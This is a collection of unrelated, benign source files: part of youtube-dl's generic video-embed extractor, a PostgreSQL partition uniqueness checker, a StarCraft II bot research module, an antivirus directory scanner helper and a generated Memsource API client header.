return self.playlist_from_matches(xhamster_urls, video_id, video_title, ie='XHamsterEmbed')
# Look for embedded TNAFlixNetwork player
tnaflix_urls = TNAFlixNetworkEmbedIE._extract_urls(webpage)
if tnaflix_urls:
return self.playlist_from_matches(tnaflix_urls, video_id, video_title, ie=TNAFlixNetworkEmbedIE.ie_key())
# Look for embedded PornHub player
pornhub_urls = PornHubIE._extract_urls(webpage)
if pornhub_urls:
return self.playlist_from_matches(pornhub_urls, video_id, video_title, ie=PornHubIE.ie_key())
# Look for embedded DrTuber player
drtuber_urls = DrTuberIE._extract_urls(webpage)
if drtuber_urls:
return self.playlist_from_matches(drtuber_urls, video_id, video_title, ie=DrTuberIE.ie_key())
# Look for embedded RedTube player
redtube_urls = RedTubeIE._extract_urls(webpage)
if redtube_urls:
return self.playlist_from_matches(redtube_urls, video_id, video_title, ie=RedTubeIE.ie_key())
# Look for embedded Tube8 player
tube8_urls = Tube8IE._extract_urls(webpage)
if tube8_urls:
return self.playlist_from_matches(tube8_urls, video_id, video_title, ie=Tube8IE.ie_key())
# Look for embedded Tvigle player
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>(?:https?:)?//cloud\.tvigle\.ru/video/.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'Tvigle')
# Look for embedded TED player
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>https?://embed(?:-ssl)?\.ted\.com/.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'TED')
# Look for embedded Ustream videos
ustream_url = UstreamIE._extract_url(webpage)
if ustream_url:
return self.url_result(ustream_url, UstreamIE.ie_key())
# Look for embedded arte.tv player
mobj = re.search(
r'<(?:script|iframe) [^>]*?src="(?P<url>http://www\.arte\.tv/(?:playerv2/embed|arte_vp/index)[^"]+)"',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'ArteTVEmbed')
# Look for embedded francetv player
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>(?:https?://)?embed\.francetv\.fr/\?ue=.+?)\1',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
# Look for embedded smotri.com player
smotri_url = SmotriIE._extract_url(webpage)
if smotri_url:
return self.url_result(smotri_url, 'Smotri')
# Look for embedded Myvi.ru player
myvi_url = MyviIE._extract_url(webpage)
if myvi_url:
return self.url_result(myvi_url)
# Look for embedded soundcloud player
soundcloud_urls = SoundcloudEmbedIE._extract_urls(webpage)
if soundcloud_urls:
return self.playlist_from_matches(soundcloud_urls, video_id, video_title, getter=unescapeHTML)
# Look for tunein player
tunein_urls = TuneInBaseIE._extract_urls(webpage)
if tunein_urls:
return self.playlist_from_matches(tunein_urls, video_id, video_title)
# Look for embedded mtvservices player
mtvservices_url = MTVServicesEmbeddedIE._extract_url(webpage)
if mtvservices_url:
return self.url_result(mtvservices_url, ie='MTVServicesEmbedded')
# Look for embedded yahoo player
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>https?://(?:screen|movies)\.yahoo\.com/.+?\.html\?format=embed)\1',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'Yahoo')
# Look for embedded sbs.com.au player
mobj = re.search(
r'''(?x)
(?:
<meta\s+property="og:video"\s+content=|
<iframe[^>]+?src=
)
(["\'])(?P<url>https?://(?:www\.)?sbs\.com\.au/ondemand/video/.+?)\1''',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'SBS')
# Look for embedded Cinchcast player
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>https?://player\.cinchcast\.com/.+?)\1',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'Cinchcast')
mobj = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>https?://m(?:lb)?\.mlb\.com/shared/video/embed/embed\.html\?.+?)\1',
webpage)
if not mobj:
mobj = re.search(
r'data-video-link=["\'](?P<url>http://m.mlb.com/video/[^"\']+)',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'MLB')
mobj = re.search(
r'<(?:iframe|script)[^>]+?src=(["\'])(?P<url>%s)\1' % CondeNastIE.EMBED_URL,
webpage)
if mobj is not None:
return self.url_result(self._proto_relative_url(mobj.group('url'), scheme='http:'), 'CondeNast')
mobj = re.search(
r'<iframe[^>]+src="(?P<url>https?://(?:new\.)?livestream\.com/[^"]+/player[^"]+)"',
webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'Livestream')
# Look for Zapiks embed
mobj = re.search(
r'<iframe[^>]+src="(?P<url>https?://(?:www\.)?zapiks\.fr/index\.php\?.+?)"', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'), 'Zapiks')
# Look for Kaltura embeds
kaltura_url = KalturaIE._extract_url(webpage)
if kaltura_url:
return self.url_result(smuggle_url(kaltura_url, {'source_url': url}), KalturaIE.ie_key())
# Look for EaglePlatform embeds
eagleplatform_url = EaglePlatformIE._extract_url(webpage)
if eagleplatform_url:
return self.url_result(smuggle_url(eagleplatform_url, {'referrer': url}), EaglePlatformIE.ie_key())
# Look for ClipYou (uses EaglePlatform) embeds
mobj = re.search(
r'<iframe[^>]+src="https?://(?P<host>media\.clipyou\.ru)/index/player\?.*\brecord_id=(?P<id>\d+).*"', webpage)
if mobj is not None:
return self.url_result('eagleplatform:%(host)s:%(id)s' % mobj.groupdict(), 'EaglePlatform')
# Look for Pladform embeds
pladform_url = PladformIE._extract_url(webpage)
if pladform_url:
return self.url_result(pladform_url)
# Look for Videomore embeds
videomore_url = VideomoreIE._extract_url(webpage)
if videomore_url:
return self.url_result(videomore_url)
# Look for Webcaster embeds
webcaster_url = WebcasterFeedIE._extract_url(self, webpage)
if webcaster_url:
return self.url_result(webcaster_url, ie=WebcasterFeedIE.ie_key())
# Look for Playwire embeds
mobj = re.search(
r'<script[^>]+data-config=(["\'])(?P<url>(?:https?:)?//config\.playwire\.com/.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
# Look for 5min embeds
mobj = re.search(
r'<meta[^>]+property="og:video"[^>]+content="https?://embed\.5min\.com/(?P<id>[0-9]+)/?', webpage)
if mobj is not None:
return self.url_result('5min:%s' % mobj.group('id'), 'FiveMin')
# Look for Crooks and Liars embeds
mobj = re.search(
r'<(?:iframe[^>]+src|param[^>]+value)=(["\'])(?P<url>(?:https?:)?//embed\.crooksandliars\.com/(?:embed|v)/.+?)\1', webpage)
if mobj is not None:
return self.url_result(mobj.group('url'))
# Look for NBC Sports VPlayer embeds
nbc_sports_url = NBCSportsVPlayerIE._extract_url(webpage)
if nbc_sports_url:
return self.url_result(nbc_sports_url, 'NBCSportsVPlayer')
# Look for NBC News embeds
nbc_news_embed_url = re.search(
r'<iframe[^>]+src=(["\'])(?P<url>(?:https?:)?//www\.nbcnews\.com/widget/video-embed/[^"\']+)\1', webpage)
if nbc_news_embed_url:
return self.url_result(nbc_news_embed_url.group('url'), 'NBCNews')
# Look for Google Drive embeds
google_drive_url = GoogleDriveIE._extract_url(webpage)
if google_drive_url:
return self.url_result(google_drive_url, 'GoogleDrive')
# Look for UDN embeds
mobj = re.search(
r'<iframe[^>]+src="(?:https?:)?(?P<url>%s)"' % UDNEmbedIE._PROTOCOL_RELATIVE_VALID_URL, webpage)
if mobj is not None:
return self.url_result(
compat_urlparse.urljoin(url, mobj.group('url')), 'UDNEmbed')
# Look for Senate ISVP iframe
senate_isvp_url = SenateISVPIE._search_iframe_url(webpage)
if senate_isvp_url:
return self.url_result(senate_isvp_url, 'SenateISVP')
# Look for Kinja embeds
kinja_embed_urls = KinjaEmbedIE._extract_urls(webpage, url)
if kinja_embed_urls:
return self.playlist_from_matches(
kinja_embed_urls, video_id, video_title)
# Look for OnionStudios embeds
onionstudios_url = OnionStudiosIE._extract_url(webpage)
if onionstudios_url:
return self.url_result(onionstudios_url)
# Look for ViewLift embeds
viewlift_url = ViewLiftEmbedIE._extract_url(webpage)
if viewlift_url:
return self.url_result(viewlift_url)
# Look for JWPlatform embeds
jwplatform_urls = JWPlatformIE._extract_urls(webpage)
if jwplatform_urls:
return self.playlist_from_matches(jwplatform_urls, video_id, video_title, ie=JWPlatformIE.ie_key())
# Look for Digiteka embeds
digiteka_url = DigitekaIE._extract_url(webpage)
if digiteka_url:
return self.url_result(self._proto_relative_url(digiteka_url), DigitekaIE.ie_key())
# Look for Arkena embeds
arkena_url = ArkenaIE._extract_url(webpage)
if arkena_url:
return self.url_result(arkena_url, ArkenaIE.ie_key())
# Look for Piksel embeds
piksel_url = PikselIE._extract_url(webpage)
if piksel_url:
return self.url_result(piksel_url, PikselIE.ie_key())
# Look for Limelight embeds
limelight_urls = LimelightBaseIE._extract_urls(webpage, url)
if limelight_urls:
return self.playlist_result(
limelight_urls, video_id, video_title, video_description)
# Look for Anvato embeds
anvato_urls = AnvatoIE._extract_urls(self, webpage, video_id)
if anvato_urls:
return self.playlist_result(
anvato_urls, video_id, video_title, video_description)
# Look for AdobeTVVideo embeds
mobj = re.search(
r'<iframe[^>]+src=[\'"]((?:https?:)?//video\.tv\.adobe\.com/v/\d+[^"]+)[\'"]',
webpage)
if mobj is not None:
return self.url_result(
self._proto_relative_url(unescapeHTML(mobj.group(1))),
'AdobeTVVideo')
# Look for Vine embeds
mobj = re.search(
r'<iframe[^>]+src=[\'"]((?:https?:)?//(?:www\.)?vine\.co/v/[^/]+/embed/(?:simple|postcard))',
webpage)
if mobj is not None:
return self.url_result(
self._proto_relative_url(unescapeHTML(mobj.group(1))), 'Vine')
# Look for VODPlatform embeds
mobj = re.search(
r'<iframe[^>]+src=(["\'])(?P<url>(?:https?:)?//(?:(?:www\.)?vod-platform\.net|embed\.kwikmotion\.com)/[eE]mbed/.+?)\1',
webpage)
if mobj is not None:
return self.url_result(
self._proto_relative_url(unescapeHTML(mobj.group('url'))), 'VODPlatform')
# Look for Mangomolo embeds
mobj = re.search(
r'''(?x)<iframe[^>]+src=(["\'])(?P<url>(?:https?:)?//
(?:
admin\.mangomolo\.com/analytics/index\.php/customers/embed|
player\.mangomolo\.com/v1
)/
(?:
video\?.*?\bid=(?P<video_id>\d+)|
(?:index|live)\?.*?\bchannelid=(?P<channel_id>(?:[A-Za-z0-9+/=]|%2B|%2F|%3D)+)
).+?)\1''', webpage)
if mobj is not None:
info = {
'_type': 'url_transparent',
'url': self._proto_relative_url(unescapeHTML(mobj.group('url'))),
'title': video_title,
'description': video_description,
'thumbnail': video_thumbnail,
'uploader': video_uploader,
}
video_id = mobj.group('video_id')
if video_id:
info.update({
'ie_key': 'MangomoloVideo',
'id': video_id,
})
else:
info.update({
'ie_key': 'MangomoloLive',
'id': mobj.group('channel_id'),
})
return info
# Look for Instagram embeds
instagram_embed_url = InstagramIE._extract_embed_url(webpage)
if instagram_embed_url is not None:
return self.url_result(
self._proto_relative_url(instagram_embed_url), InstagramIE.ie_key())
# Look for LiveLeak embeds
liveleak_urls = LiveLeakIE._extract_urls(webpage)
if liveleak_urls:
return self.playlist_from_matches(liveleak_urls, video_id, video_title)
# Look for 3Q SDN embeds
threeqsdn_url = ThreeQSDNIE._extract_url(webpage)
if threeqsdn_url:
return {
'_type': 'url_transparent',
'ie_key': ThreeQSDNIE.ie_key(),
'url': self._proto_relative_url(threeqsdn_url),
'title': video_title,
'description': video_description,
'thumbnail': video_thumbnail,
'uploader': video_uploader,
}
# Look for VBOX7 embeds
vbox7_url = Vbox7IE._extract_url(webpage)
if vbox7_url:
return self.url_result(vbox7_url, Vbox7IE.ie_key())
# Look for DBTV embeds
dbtv_urls = DBTVIE._extract_urls(webpage)
if dbtv_urls:
return self.playlist_from_matches(dbtv_urls, video_id, video_title, ie=DBTVIE.ie_key())
# Look for Videa embeds
videa_urls = VideaIE._extract_urls(webpage)
if videa_urls:
return self.playlist_from_matches(videa_urls, video_id, video_title, ie=VideaIE.ie_key())
# Look for 20 minuten embeds
twentymin_urls = TwentyMinutenIE._extract_urls(webpage)
if twentymin_urls:
return self.playlist_from_matches(
twentymin_urls, video_id, video_title, ie=TwentyMinutenIE.ie_key())
# Look for VideoPress embeds
videopress_urls = VideoPressIE._extract_urls(webpage)
if videopress_urls:
return self.playlist_from_matches(
videopress_urls, video_id, video_title, ie=VideoPressIE.ie_key())
# Look for Rutube embeds
rutube_urls = RutubeIE._extract_urls(webpage)
if rutube_urls:
return self.playlist_from_matches(
rutube_urls, video_id, video_title, ie=RutubeIE.ie_key())
# Look for WashingtonPost embeds
wapo_urls = WashingtonPostIE._extract_urls(webpage)
if wapo_urls:
return self.playlist_from_matches(
wapo_urls, video_id, video_title, ie=WashingtonPostIE.ie_key())
# Look for Mediaset embeds
mediaset_urls = MediasetIE._extract_urls(self, webpage)
if mediaset_urls:
return self.playlist_from_matches(
mediaset_urls, video_id, video_title, ie=MediasetIE.ie_key())
# Look for JOJ.sk embeds
joj_urls = JojIE._extract_urls(webpage)
if joj_urls:
return self.playlist_from_matches(
joj_urls, video_id, video_title, ie=JojIE.ie_key())
# Look for megaphone.fm embeds
mpfn_urls = MegaphoneIE._extract_urls(webpage)
if mpfn_urls:
return self.playlist_from_matches(
mpfn_urls, video_id, video_title, ie=MegaphoneIE.ie_key())
# Look for vzaar embeds
vzaar_urls = VzaarIE._extract_urls(webpage)
if vzaar_urls:
return self.playlist_from_matches(
vzaar_urls, video_id, video_title, ie=VzaarIE.ie_key())
channel9_urls = Channel9IE._extract_urls(webpage)
if channel9_urls:
return self.playlist_from_matches(
channel9_urls, video_id, video_title, ie=Channel9IE.ie_key())
vshare_urls = VShareIE._extract_urls(webpage)
if vshare_urls:
return self.playlist_from_matches(
vshare_urls, video_id, video_title, ie=VShareIE.ie_key())
# Look for Mediasite embeds
mediasite_urls = MediasiteIE._extract_urls(webpage)
if mediasite_urls:
entries = [
self.url_result(smuggle_url(
compat_urlparse.urljoin(url, mediasite_url),
{'UrlReferrer': url}), ie=MediasiteIE.ie_key())
for mediasite_url in mediasite_urls]
return self.playlist_result(entries, video_id, video_title)
springboardplatform_urls = SpringboardPlatformIE._extract_urls(webpage)
if springboardplatform_urls:
return self.playlist_from_matches(
springboardplatform_urls, video_id, video_title,
ie=SpringboardPlatformIE.ie_key())
yapfiles_urls = YapFilesIE._extract_urls(webpage)
if yapfiles_urls:
return self.playlist_from_matches(
yapfiles_urls, video_id, video_title, ie=YapFilesIE.ie_key())
vice_urls = ViceIE._extract_urls(webpage)
if vice_urls:
return self.playlist_from_matches(
vice_urls, video_id, video_title, ie=ViceIE.ie_key())
xfileshare_urls = XFileShareIE._extract_urls(webpage)
if xfileshare_urls:
return self.playlist_from_matches(
xfileshare_urls, video_id, video_title, ie=XFileShareIE.ie_key())
cloudflarestream_urls = CloudflareStreamIE._extract_urls(webpage)
if cloudflarestream_urls:
return self.playlist_from_matches(
cloudflarestream_urls, video_id, video_title, ie=CloudflareStreamIE.ie_key())
peertube_urls = PeerTubeIE._extract_urls(webpage, url)
if peertube_urls:
return self.playlist_from_matches(
peertube_urls, video_id, video_title, ie=PeerTubeIE.ie_key())
teachable_url = TeachableIE._extract_url(webpage, url)
if teachable_url:
return self.url_result(teachable_url)
indavideo_urls = IndavideoEmbedIE._extract_urls(webpage)
if indavideo_urls:
return self.playlist_from_matches(
indavideo_urls, video_id, video_title, ie=IndavideoEmbedIE.ie_key())
apa_urls = APAIE._extract_urls(webpage)
if apa_urls:
return self.playlist_from_matches(
apa_urls, video_id, video_title, ie=APAIE.ie_key())
foxnews_urls = FoxNewsIE._extract_urls(webpage)
if foxnews_urls:
return self.playlist_from_matches(
foxnews_urls, video_id, video_title, ie=FoxNewsIE.ie_key())
sharevideos_urls = [sharevideos_mobj.group('url') for sharevideos_mobj in re.finditer(
r'<iframe[^>]+?\bsrc\s*=\s*(["\'])(?P<url>(?:https?:)?//embed\.share-videos\.se/auto/embed/\d+\?.*?\buid=\d+.*?)\1',
webpage)]
if sharevideos_urls:
return self.playlist_from_matches(
sharevideos_urls, video_id, video_title)
viqeo_urls = ViqeoIE._extract_urls(webpage)
if viqeo_urls:
return self.playlist_from_matches(
viqeo_urls, video_id, video_title, ie=ViqeoIE.ie_key())
expressen_urls = ExpressenIE._extract_urls(webpage)
if expressen_urls:
return self.playlist_from_matches(
expressen_urls, video_id, video_title, ie=ExpressenIE.ie_key())
zype_urls = ZypeIE._extract_urls(webpage)
if zype_urls:
return self.playlist_from_matches(
zype_urls, video_id, video_title, ie=ZypeIE.ie_key())
# Look for HTML5 media
entries = self._parse_html5_media_entries(url, webpage, video_id, m3u8_id='hls')
if entries:
if len(entries) == 1:
entries[0].update({
'id': video_id,
'title': video_title,
})
else:
for num, entry in enumerate(entries, start=1):
entry.update({
'id': '%s-%s' % (video_id, num),
'title': '%s (%d)' % (video_title, num),
})
for entry in entries:
self._sort_formats(entry['formats'])
return self.playlist_result(entries, video_id, video_title)
jwplayer_data = self._find_jwplayer_data(
webpage, video_id, transform_source=js_to_json)
if jwplayer_data:
try:
info = self._parse_jwplayer_data(
jwplayer_data, video_id, require_title=False, base_url=url)
return merge_dicts(info, info_dict)
except ExtractorError:
# See https://github.com/ytdl-org/youtube-dl/pull/16735
pass
# Video.js embed
mobj = re.search(
r'(?s)\bvideojs\s*\(.+?\.src\s*\(\s*((?:\[.+?\]|{.+?}))\s*\)\s*;',
webpage)
if mobj is not None:
sources = self._parse_json(
mobj.group(1), video_id, transform_source=js_to_json,
fatal=False) or []
if not isinstance(sources, list):
sources = [sources]
formats = []
for source in sources:
src = source.get('src')
if not src or not isinstance(src, compat_str):
continue
src = compat_urlparse.urljoin(url, src)
src_type = source.get('type')
if isinstance(src_type, compat_str):
src_type = src_type.lower()
ext = determine_ext(src).lower()
if src_type == 'video/youtube':
return self.url_result(src, YoutubeIE.ie_key())
if src_type == 'application/dash+xml' or ext == 'mpd':
formats.extend(self._extract_mpd_formats(
src, video_id, mpd_id='dash', fatal=False))
elif src_type == 'application/x-mpegurl' or ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
src, video_id, 'mp4', entry_protocol='m3u8_native',
m3u8_id='hls', fatal=False))
else:
formats.append({
'url': src,
'ext': (mimetype2ext(src_type)
or ext if ext in KNOWN_EXTENSIONS else 'mp4'),
})
if formats:
self._sort_formats(formats)
info_dict['formats'] = formats
return info_dict
# Looking for http://schema.org/VideoObject
json_ld = self._search_json_ld(
webpage, video_id, default={}, expected_type='VideoObject')
if json_ld.get('url'):
return merge_dicts(json_ld, info_dict)
def check_video(vurl):
if YoutubeIE.suitable(vurl):
return True
if RtmpIE.suitable(vurl):
return True
vpath = compat_urlparse.urlparse(vurl).path
vext = determine_ext(vpath)
return '.' in vpath and vext not in ('swf', 'png', 'jpg', 'srt', 'sbv', 'sub', 'vtt', 'ttml', 'js', 'xml')
def filter_video(urls):
return list(filter(check_video, urls))
# Start with something easy: JW Player in SWFObject
found = filter_video(re.findall(r'flashvars: [\'"](?:.*&)?file=(http[^\'"&]*)', webpage))
if not found:
# Look for gorilla-vid style embedding
found = filter_video(re.findall(r'''(?sx)
(?:
jw_plugins|
JWPlayerOptions|
jwplayer\s*\(\s*["'][^'"]+["']\s*\)\s*\.setup
)
.*?
['"]?file['"]?\s*:\s*["\'](.*?)["\']''', webpage))
if not found:
# Broaden the search a little bit
found = filter_video(re.findall(r'[^A-Za-z0-9]?(?:file|source)=(http[^\'"&]*)', webpage))
if not found:
# Broaden the findall a little bit: JWPlayer JS loader
found = filter_video(re.findall(
r'[^A-Za-z0-9]?(?:file|video_url)["\']?:\s*["\'](http(?![^\'"]+\.[0-9]+[\'"])[^\'"]+)["\']', webpage))
if not found:
# Flow player
found = filter_video(re.findall(r'''(?xs)
flowplayer\("[^"]+",\s*
\{[^}]+?\}\s*,
\s*\{[^}]+? ["']?clip["']?\s*:\s*\{\s*
["']?url["']?\s*:\s*["']([^"']+)["']
''', webpage))
if not found:
# Cinerama player
found = re.findall(
r"cinerama\.embedPlayer\(\s*\'[^']+\',\s*'([^']+)'", webpage)
if not found:
# Try to find twitter cards info
# twitter:player:stream should be checked before twitter:player since
# it is expected to contain a raw stream (see
# https://dev.twitter.com/cards/types/player#On_twitter.com_via_desktop_browser)
found = filter_video(re.findall(
r'<meta (?:property|name)="twitter:player:stream" (?:content|value)="(.+?)"', webpage))
if not found:
# We look for Open Graph info:
# We have to match any number spaces between elements, some sites try to align them (eg.: statigr.am)
m_video_type = re.findall(r'<meta.*?property="og:video:type".*?content="video/(.*?)"', webpage)
# We only look in og:video if the MIME type is a video, don't try if it's a Flash player:
if m_video_type is not None:
found = filter_video(re.findall(r'<meta.*?property="og:video".*?content="(.*?)"', webpage))
if not found:
REDIRECT_REGEX = r'[0-9]{,2};\s*(?:URL|url)=\'?([^\'"]+)'
found = re.search(
r'(?i)<meta\s+(?=(?:[a-z-]+="[^"]+"\s+)*http-equiv="refresh")'
r'(?:[a-z-]+="[^"]+"\s+)*?content="%s' % REDIRECT_REGEX,
webpage)
if not found:
# Look also in Refresh HTTP header
refresh_header = head_response.headers.get('Refresh')
if refresh_header:
# In python 2 response HTTP headers are bytestrings
if sys.version_info < (3, 0) and isinstance(refresh_header, str):
refresh_header = refresh_header.decode('iso-8859-1')
found = re.search(REDIRECT_REGEX, refresh_header)
if found:
new_url = compat_urlparse.urljoin(url, unescapeHTML(found.group(1)))
if new_url != url:
self.report_following_redirect(new_url)
return {
'_type': 'url',
'url': new_url,
}
else:
found = None
if not found:
# twitter:player is a https URL to iframe player that may or may not
# be supported by youtube-dl thus this is checked the very last (see
# https://dev.twitter.com/cards/types/player#On_twitter.com_via_desktop_browser)
embed_url = self._html_search_meta('twitter:player', webpage, default=None)
if embed_url and embed_url != url:
return self.url_result(embed_url)
if not found:
raise UnsupportedError(url)
entries = []
for video_url in orderedSet(found):
video_url = unescapeHTML(video_url)
video_url = video_url.replace('\\/', '/')
video_url = compat_urlparse.urljoin(url, video_url)
video_id = compat_urllib_parse_unquote(os.path.basename(video_url))
# Sometimes, jwplayer extraction will result in a YouTube URL
if YoutubeIE.suitable(video_url):
entries.append(self.url_result(video_url, 'Youtube'))
continue
# here's a fun little line of code for you:
video_id = os.path.splitext(video_id)[0]
entry_info_dict = {
'id': video_id,
'uploader': video_uploader,
'title': video_title,
'age_limit': age_limit,
}
if RtmpIE.suitable(video_url):
entry_info_dict.update({
'_type': 'url_transparent',
'ie_key': RtmpIE.ie_key(),
'url': video_url,
})
entries.append(entry_info_dict)
continue
ext = determine_ext(video_url)
if ext == 'smil':
entry_info_dict['formats'] = self._extract_smil_formats(video_url, video_id)
elif ext == 'xspf':
return self.playlist_result(self._extract_xspf_playlist(video_url, video_id), video_id)
elif ext == 'm3u8':
entry_info_dict['formats'] = self._extract_m3u8_formats(video_url, video_id, ext='mp4')
elif ext == 'mpd':
entry_info_dict['formats'] = self._extract_mpd_formats(video_url, video_id)
elif ext == 'f4m':
entry_info_dict['formats'] = self._extract_f4m_formats(video_url, video_id)
elif re.search(r'(?i)\.(?:ism|smil)/manifest', video_url) and video_url != url:
# Just matching .ism/manifest is not enough to be reliably sure
# whether it's actually an ISM manifest or some other streaming
# manifest since there are various streaming URL formats
# possible (see [1]) as well as some other shenanigans like
# .smil/manifest URLs that actually serve an ISM (see [2]) and
# so on.
# Thus the most reasonable way to solve this is to delegate
# to generic extractor in order to look into the contents of
# the manifest itself.
# 1. https://azure.microsoft.com/en-us/documentation/articles/media-services-deliver-content-overview/#streaming-url-formats
# 2. https://svs.itworkscdn.net/lbcivod/smil:itwfcdn/lbci/170976.smil/Manifest
entry_info_dict = self.url_result(
smuggle_url(video_url, {'to_generic': True}),
GenericIE.ie_key())
else:
entry_info_dict['url'] = video_url
if entry_info_dict.get('formats'):
self._sort_formats(entry_info_dict['formats'])
entries.append(entry_info_dict)
if len(entries) == 1:
return entries[0]
else:
for num, e in enumerate(entries, start=1):
# 'url' results don't have a title
if e.get('title') is not None:
e['title'] = '%s (%d)' % (e['title'], num)
return {
'_type': 'playlist',
'entries': entries,
}
|
the-stack_106_14763
|
#!/usr/bin/env python
import argparse, collections, psycopg2, os, subprocess, sys, tempfile
parser = argparse.ArgumentParser(description="This script is used to check that all rows in a partition set are unique for the given columns. Since unique constraints are not applied across partition sets, this cannot be enforced within the database. This script can be used as a monitor to ensure uniquness. If any unique violations are found, the values, along with a count of each, are output.")
parser.add_argument('-p', '--parent', required=True, help="Parent table of the partition set to be checked")
parser.add_argument('-l', '--column_list', required=True, help="Comma separated list of columns that make up the unique constraint to be checked")
parser.add_argument('-c','--connection', default="host=localhost", help="""Connection string for use by psycopg. Defaults to "host=localhost".""")
parser.add_argument('-t', '--temp', help="Path to a writable folder that can be used for temp working files. Defaults system temp folder.")
parser.add_argument('--psql', help="Full path to psql binary if not in current PATH")
parser.add_argument('--simple', action="store_true", help="Output a single integer value with the total duplicate count. Use this for monitoring software that requires a simple value to be checked for.")
parser.add_argument('--index_scan', action="store_true", help="By default index scans are disabled to force the script to check the actual table data with sequential scans. Set this option if you want the script to allow index scans to be used (does not guarentee that they will be used).")
parser.add_argument('-q', '--quiet', action="store_true", help="Suppress all output unless there is a constraint violation found.")
args = parser.parse_args()
if args.temp == None:
tmp_copy_file = tempfile.NamedTemporaryFile(prefix="partman_constraint")
else:
tmp_copy_file = tempfile.NamedTemporaryFile(prefix="partman_constraint", dir=args.temp)
fh = open(tmp_copy_file.name, 'w')
conn = psycopg2.connect(args.connection)
conn.set_session(isolation_level="REPEATABLE READ", readonly=True)
cur = conn.cursor()
if args.index_scan == False:
sql = """set enable_bitmapscan = false;
set enable_indexonlyscan = false;
set enable_indexscan = false;
set enable_seqscan = true;"""
else:
sql = """set enable_bitmapscan = true;
set enable_indexonlyscan = true;
set enable_indexscan = true;
set enable_seqscan = false;"""
cur.execute(sql)
cur.close()
cur = conn.cursor()
if not args.quiet:
print("Dumping out column data to temp file...")
cur.copy_to(fh, args.parent, sep=",", columns=args.column_list.split(","))
conn.rollback()
conn.close()
fh.close()
total_count = 0
if not args.quiet:
print("Checking for dupes...")
with open(tmp_copy_file.name) as infile:
counts = collections.Counter(l.strip() for l in infile)
for line, count in counts.most_common():
if count > 1:
if not args.simple:
print(str(line) + ": " + str(count))
total_count += count
if args.simple:
if total_count > 0:
print(total_count)
elif not args.quiet:
print(total_count)
else:
if total_count == 0 and not args.quiet:
print("No constraint violations found")
|
the-stack_106_14764
|
import sc2
from sc2.ids.ability_id import AbilityId
from sc2.constants import *
_debug = False
class Fleet:
def __init__(self, unit):
self.tag = unit.tag
self.unit = unit
self.label = 'Idle'
#research flags.
self._pulse_crystals_researched = False
self._grav_catapult_researched = False
self._pulse_crystals_started = False
self._grav_catapult_started = False
self.current_research = None
async def make_decision(self, game, unit):
self.game = game
self.unit = unit
self.abilities = self.game.allAbilities.get(self.unit.tag)
if self.unit.is_idle:
await self.runList()
else:
self.label = 'Researching {}'.format(self.current_research)
#debugging info
if self.game.debugAllowed:
if _debug or self.unit.is_selected:
self.game._client.debug_text_3d(self.label, self.unit.position3d)
async def runList(self):
#check if we need to mark a research as finished.
self.checkResearched()
#check to see if saving resources are being requested.
if self.resourcesSaved():
self.label = 'Resources being saved'
return
#only build when queues are full to maximize military production
if not self.game._strat_manager.allAllowedQueued:
self.label = 'Building Military Instead'
return
#see if we can research anything.
if self.researchPulseCrystals():
return
#gravcats were removed.
# if self.researchGravCat():
# return
self.label = 'Idle'
def researchPulseCrystals(self):
if self.game.units(PHOENIX).amount >= 3 and not self._pulse_crystals_started and not self._pulse_crystals_researched:
if AbilityId.RESEARCH_PHOENIXANIONPULSECRYSTALS in self.abilities and self.game.can_afford(RESEARCH_PHOENIXANIONPULSECRYSTALS):
self.game.combinedActions.append(self.unit(AbilityId.RESEARCH_PHOENIXANIONPULSECRYSTALS))
self._pulse_crystals_started = True
self.current_research = 'PulseCrystals'
self.game.can_spend = False
return True
def researchGravCat(self):
if self.game.units(CARRIER).amount >= 2 and not self._grav_catapult_started and not self._grav_catapult_researched:
if AbilityId.RESEARCH_INTERCEPTORGRAVITONCATAPULT in self.abilities and self.game.can_afford(RESEARCH_INTERCEPTORGRAVITONCATAPULT):
self.game.combinedActions.append(self.unit(AbilityId.RESEARCH_INTERCEPTORGRAVITONCATAPULT))
self._grav_catapult_started = True
self.current_research = 'GravCat'
self.game.can_spend = False
return True
def checkResearched(self):
if self.current_research:
if self.current_research == 'PulseCrystals':
self._pulse_crystals_researched = True
self._pulse_crystals_started = False
self.current_research = None
elif self.current_research == 'GravCat':
self._grav_catapult_researched = True
self._grav_catapult_started = False
self.current_research = None
def resourcesSaved(self):
if self.game._strat_manager.saving or not self.game.can_spend:
return True
@property
def pulseCrystalsReady(self) -> bool:
return self._pulse_crystals_researched
|
the-stack_106_14765
|
from iemlav.lib.antivirus.antivirus_logger import AntiVirusLogger
import os
class GatherFile(object):
"""GatherFile class."""
def __init__(self, debug=False, path=None):
# Initialize logger
self.logger = AntiVirusLogger(
__name__,
debug=debug
)
# Initialize path of directory to look for
self._PATH = path
def scan_dir(self):
found_files = [] # Initialize empty list of found files
try:
# Iterate through the directory
for root, _, files in os.walk(self._PATH):
for file in files:
found_files.append(os.path.join(root, file))
except Exception as e:
self.logger.log(
"Error occurred: " + str(e),
logtype="error"
)
# Return the list of found files
return found_files
|
the-stack_106_14766
|
# coding: utf-8
"""
Memsource REST API
Welcome to Memsource's API documentation. To view our legacy APIs please [visit our documentation](https://wiki.memsource.com/wiki/Memsource_API) and for more information about our new APIs, [visit our blog](https://www.memsource.com/blog/2017/10/24/introducing-rest-apis-qa-with-the-memsource-api-team/). If you have any questions, please contact [Memsource Support](<mailto:[email protected]>). # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
